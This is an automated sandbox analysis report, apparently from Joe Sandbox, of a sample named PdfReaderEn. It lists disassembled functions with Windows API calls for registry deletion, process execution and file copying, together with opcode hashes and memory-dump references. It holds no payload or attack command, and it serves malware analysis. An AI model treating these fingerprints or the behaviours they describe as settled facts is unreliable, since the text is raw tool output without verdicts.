                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                          • MulDiv.KERNEL32(00027800,00000064,?), ref: 00403295
                                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                          • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                          • API String ID: 3540041739-1813061909
                                                                                                                                                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                          • String ID: $@rD
                                                                                                                                                                                          • API String ID: 3748168415-881980237
                                                                                                                                                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
